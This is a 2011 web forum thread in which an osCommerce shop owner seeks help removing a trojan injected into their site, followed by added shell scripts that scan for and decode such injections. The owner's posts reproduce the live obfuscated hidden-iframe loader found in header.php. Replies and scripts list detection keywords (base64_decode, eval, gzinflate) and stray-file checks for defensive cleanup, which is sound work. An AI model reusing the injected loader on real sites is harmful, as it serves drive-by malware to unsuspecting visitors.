Tsport Posted February 24, 2011
Hey everyone. I got some strange problem: some trojan virus can be detected when you first enter the web-site. It shows sometimes that http://4684/ and something here is logged, and the virus threat pops up! Here's my web: http://billing.iqxtech.com. Please tell me some advice how to remove it... or how to find it.
germ Posted February 24, 2011
I don't see any malicious files, or scripts or iframes in the source. Check the contents of the .htaccess in the root folder for redirects to other sites.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help
Guest Posted February 25, 2011
Alex, I agree with Jim. I did not really find any signs of hacker files and received no security messages while looking around your website. Chris
Tsport Posted March 6, 2011 (Author)
I still got the same problem!!! Sometimes I get some strange trojan security report when I just get into the index, and in the source I found this:

<div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="8931" height="1" width="1"><img src="about:blank" onError='njjavmj=unescape("%27");jaeju=eval("document.getElementById("+njjavmj+"rsaqr"+njjavmj+").src=unescape("+njjavmj+"%68%74%74%70%3A%2F%2F"+njjavmj+")+document.getElementById("+njjavmj+"8931"+njjavmj+").id+unescape("+njjavmj+"%2E%69%6E%2F"+njjavmj+")+"+njjavmj+"1299430150"+njjavmj+"+unescape("+njjavmj+"%2E%70%68%70"+njjavmj+")");document.getElementById("rsaqr").src=jaeju' style="width:300;height:300;border:0px;"><iframe id="rsaqr" src="about:blank"></iframe></div><!-- header_eof //-->

and the trojan comes from http://8931.in/dududu.js. I have tried to find this source code in all the pages (header.php, index.php, etc.) and I found nothing! And btw the four numbers always change; sometimes it can be like 5436.in/ and so on... And when I get no trojan reports the source is without this code:

</script><form name="quick_find" action="http://billing.iqxtech.com/advanced_search_result.php" method="get"><input type="text" name="keywords" value="חיפוש מהיר..." id="txtSearch" size="15" onFocus="Clear(this)" autocomplete="off" maxlength="50" class=searchHeader> <input type="hidden" name="osCsid" value="f257a22ba87b3527fbac707b28c7140f"> <input type=image src=layout/images/search_btn.gif align="absmiddle" > </form></div></div><br class="clearfloat" /> <div id="mainContent"> <div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="8931" height="1" width="1"><img src="about:blank" onError='njjavmj=unescape("%27");jaeju=eval("document.getElementById("+njjavmj+"rsaqr"+njjavmj+").src=unescape("+njjavmj+"%68%74%74%70%3A%2F%2F"+njjavmj+")+document.getElementById("+njjavmj+"8931"+njjavmj+").id+unescape("+njjavmj+"%2E%69%6E%2F"+njjavmj+")+"+njjavmj+"1299430150"+njjavmj+"+unescape("+njjavmj+"%2E%70%68%70"+njjavmj+")");document.getElementById("rsaqr").src=jaeju' style="width:300;height:300;border:0px;"><iframe id="rsaqr" src="about:blank"></iframe></div><!-- header_eof //--> <!-- body //-->

up to <div style="display: block;. The source is in header.php. Here's the site: http://iqxtech.com
germ Posted March 6, 2011
Hack files currently in your images folder: google033ca56fcb20d1b7.php, googlec6e11a4aebef71ed.php, googleeeae99914d1a2ad8.php

Hackers hide their code. Look for code in your files that has these PHP keywords: base64_decode or eval or gzinflate
Tsport Posted March 6, 2011 (Author)
How should I look for them in my PHP files? With what program? Thank you!
germ Posted March 6, 2011
I don't see anything like the code you posted in the page source when I access the site. If you found it in the header then use a text editor and look in /includes/header.php
Tsport Posted March 6, 2011 (Author)
I have deleted google033ca56fcb20d1b7.php, googlec6e11a4aebef71ed.php and googleeeae99914d1a2ad8.php in the image folder and the hack has gone :P Now I need to protect my folders.
WhiteKnight Posted March 6, 2011
"How should I look for them in my PHP files? With what program? Thank you!"

If you use most web editing tools (like Dreamweaver) you will have a search or find function and usually options on how it does that. So you search or find for "base64_decode" (for example) and select entire site. Then you will get a list of files with that code in them. In the case of this example it is usually at the top of every PHP file in the site and it is usually easier to upload a clean copy of your files than fix every file. Search the forums or Google for how to fix your system to prevent specific things you find.

If you have a way to get a file count on your host (maybe 400-several thousand files) you can check that and when no users are on it should only change when you add something. If it changes without you adding something then someone else added some file somewhere. Sometimes you can find those by sorting by date/time on the host and seeing what the "new" file(s) are.

Of course do all the regular security measures detailed elsewhere on the forums, like file/dir permission, htaccess, etc. Good luck.
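The checks germ and WhiteKnight describe (grep the site for base64_decode / eval / gzinflate, look for PHP files in the images folder, keep a file count baseline, and list what was modified since a known-good snapshot) can be scripted. The script below is an added example, not code from the thread or from osCommerce; it assumes a POSIX shell with find and grep, and the site tree it builds under $DEMO_SITE is constructed sample data whose file names and payload are placeholders.

```shell
#!/bin/sh
# Added example (not from the thread): shell versions of the checks germ and
# WhiteKnight describe. Everything under $DEMO_SITE is constructed sample data.

DEMO_SITE="${TMPDIR:-/tmp}/osc_scan_demo"

# Build a small constructed site: two clean files stamped with an old date,
# a snapshot marker with the same old date, then one file with an injected
# eval(base64_decode(...)) line and one stray PHP file in images/ (both "new").
setup_demo_site() {
    rm -rf "$DEMO_SITE"
    mkdir -p "$DEMO_SITE/includes" "$DEMO_SITE/images"
    printf '<?php\n// clean header\necho "header";\n' > "$DEMO_SITE/includes/header.php"
    printf '<?php\n// clean index\necho "index";\n' > "$DEMO_SITE/index.php"
    touch "$DEMO_SITE/.last_known_good"
    # Constructed timestamp (the thread's date) so the marker is older than the new files.
    touch -t 201102240000 "$DEMO_SITE/includes/header.php" "$DEMO_SITE/index.php" \
        "$DEMO_SITE/.last_known_good"
    # Constructed injection; the base64 argument is a placeholder, not real code.
    printf '<?php eval(base64_decode("PLACEHOLDER"));?>\n<?php echo "top";\n' \
        > "$DEMO_SITE/includes/application_top.php"
    # Constructed name; the files germ found were named google<hex>.php.
    printf '<?php echo "not a verification file";\n' \
        > "$DEMO_SITE/images/googlePLACEHOLDER.php"
}

# List each PHP file containing one of the keywords germ lists. The eval
# pattern requires a non-identifier character before it so that words such
# as "retrieval(" are not reported.
find_suspicious_php() {
    find "$1" -type f -name '*.php' \
        -exec grep -lE 'base64_decode|gzinflate|(^|[^A-Za-z0-9_])eval *\(' {} +
}

# PHP files under images/ have no business being there (that is where the
# hack files in this thread were dropped).
find_php_in_images() {
    find "$1/images" -type f -name '*.php'
}

# Total file count, the baseline WhiteKnight suggests recording.
count_files() {
    find "$1" -type f | wc -l | tr -d ' '
}

# Files modified after the reference file: what changed since the snapshot.
files_newer_than() {
    find "$1" -type f -newer "$2"
}

if [ "${1:-}" = "--demo" ]; then
    setup_demo_site
    echo "suspicious PHP:";      find_suspicious_php "$DEMO_SITE"
    echo "PHP in images/:";      find_php_in_images "$DEMO_SITE"
    echo "file count: $(count_files "$DEMO_SITE")"
    echo "changed since snapshot:"; files_newer_than "$DEMO_SITE" "$DEMO_SITE/.last_known_good"
    rm -rf "$DEMO_SITE"
fi
```

On a real site, run the functions against the document root and compare count_files against the number recorded the last time you changed something yourself; `touch` a marker file after each legitimate change so that files_newer_than only reports what you did not add.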
Guest Posted March 6, 2011
I wouldn't suggest using Dreamweaver at all! Use Wingrep to search all files once downloaded onto your local machine. Chris
Taipo Posted March 7, 2011
You also need to patch your website so that an attacker cannot return and repeat the same action again.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX
Tsport Posted March 8, 2011 (Author)
What patch? Can you link to the patch please? I have found this code:

<?php eval(base64_decode("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"));?>

in Header.php. Can you decode it? :P Interesting what's typed in there.
Taipo Posted March 8, 2011
The eval code you posted, when decoded, contains a function that when called allows eval code strings to be called in reverse (basically reading code backwards). It looks to me like it's a logging script that logs the site visitor's IP and downloads some code (probably a file with a virus in it) from a URL on a server at http:// ininininin.in/ as well as placing a cookie in your browser while bypassing any search engines that may view that page.

As for the patch link, there are quite a few posts in this forum with extensive lists of instructions of how to patch your site to clean up affected pages and patch the security holes so that attackers cannot further compromise your security. Most of them are in reference to this type of problem.
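Both obfuscation layers in this thread, the unescape("%XX...") strings inside the injected onError handler from Tsport's earlier post and the eval(base64_decode("...")) line Taipo decodes here, can be unwrapped for reading without ever executing them. The script below is an added example, not code from the thread; it assumes a POSIX shell with awk and GNU `base64 -d`, and the eval line it decodes is a constructed sample wrapping a harmless statement, not the thread's real payload (which the page does not reproduce).

```shell
#!/bin/sh
# Added example (not from the thread): decode the two obfuscation layers seen
# above without executing anything. Assumes POSIX sh, awk and GNU `base64 -d`.

# Decode %XX sequences (the unescape("...") strings in the injected onError
# handler) so the pieces of the URL the hidden iframe would load are readable.
url_decode() {
    printf '%s' "$1" | awk '
        BEGIN { hex = "0123456789abcdef" }
        {
            out = ""; n = length($0)
            for (i = 1; i <= n; i++) {
                c = substr($0, i, 1)
                if (c == "%" && i + 2 <= n) {
                    hi = index(hex, tolower(substr($0, i + 1, 1))) - 1
                    lo = index(hex, tolower(substr($0, i + 2, 1))) - 1
                    if (hi >= 0 && lo >= 0) {
                        out = out sprintf("%c", hi * 16 + lo)
                        i += 2
                        continue
                    }
                }
                out = out c
            }
            print out
        }'
}

# Pull the base64 argument out of an eval(base64_decode("...")) line and print
# the decoded PHP instead of running it. The result is plain text that can be
# reviewed, or unwrapped again if it contains another encoded layer.
decode_eval_payload() {
    printf '%s\n' "$1" \
        | sed -n 's|.*base64_decode("\([A-Za-z0-9+/=]*\)").*|\1|p' \
        | base64 -d
}

# Constructed sample: a harmless PHP statement wrapped the way the injected
# header.php line was. The thread's real payload is not reproduced here.
SAMPLE_INNER='echo "constructed sample payload";'
SAMPLE_B64=$(printf '%s' "$SAMPLE_INNER" | base64)
SAMPLE_LINE="<?php eval(base64_decode(\"$SAMPLE_B64\"));?>"

if [ "${1:-}" = "--demo" ]; then
    # The three unescape() pieces from the onError handler on the page.
    url_decode '%68%74%74%70%3A%2F%2F'   # http://
    url_decode '%2E%69%6E%2F'            # .in/
    url_decode '%2E%70%68%70'            # .php
    decode_eval_payload "$SAMPLE_LINE"   # the wrapped statement, not executed
fi
```

The point of printing rather than evaluating is the same one Taipo makes: the decoded text is where the logging, download and cookie behaviour becomes visible, and each further eval/strrev/base64 layer is unwrapped the same way, as text, until plain PHP remains.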
Jeanne1971 Posted March 17, 2011
I've also got the "Trojan Virus" that keeps being blocked by Avast. So far, an item has been removed, only for it to return. Not sure what to do. States: Trojan Horse JS:IFrame-AU[Trj} Please help. Any help would be SO appreciated. Thank you so much in advance. Jeanne
This topic is now archived and is closed to further replies.